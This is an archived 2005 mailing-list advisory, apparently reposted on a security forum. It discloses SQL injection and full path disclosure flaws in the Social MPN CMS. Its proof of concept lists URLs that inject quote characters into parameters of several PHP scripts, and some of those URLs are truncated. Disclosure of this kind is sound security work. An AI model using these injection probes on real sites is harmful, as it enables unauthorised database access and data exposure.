Social Mpn Sql Injection And Full Path


Help - Search - Member List - Calendar Full Version: Social Mpn Sql Injection And Full Path GovernmentSecurity.org > General GSO > Exploit & Vulnerability Mailing List Archives qcred11 Jun 19 2005, 05:20 PM QUOTE Program: Social MPN Homepage: http://www.socialmpn.com Vulnerable Versions: all Risk: high Impact: sql injection and full path disclosure, attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and expose sensitive information. - Description Social MPN is one CMS myPHPNuke like. SocialMPN The biggest change to the system is the multi-site functionality we have incorporated into the package. This allows you to run multiple websites from one install of SocialMPN. This can range to completely separate domains (ie: Ruffdogs.com, vsadesign.com), to an all inclusive site with user owned sections, or based on sub-domains, guilinux.com, mandrake.guilinux.com, fedora.guilinux.com, (wild cards must be enabled on the server for this). POC: Tested with these query variables http://xxx.xxx.xxx.xxx/article.php?sid=%27 http://xxx.xxx.xxx.xxx/user.php?uname='&pass=1&op=login http://xxx.xxx.xxx.xxx/viewforum.php?forum=43&siteid=%2527 http://xxx.xxx.xxx.xxx/newtopic.php?username='&password= http://xxx.xxx.xxx.xxx/sections.php?op=lis...icles&secid=%27 http://xxx.xxx.xxx.xxx/sections.php?op=lis...les&artid=%2527 http://xxx.xxx.xxx.xxx/index.php?siteid=&#...ow&aftersid=380 http://xxx.xxx.xxx.xxx/friend.php?sid=%252...=1&op=SendStory - Credits ------------------------------------------------- Discovered by LINUX <admin@sosvulnerable.net> http://www.sosvulnerable.net/ This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

Invision Power Board © 2001-2005 Invision Power Services, Inc.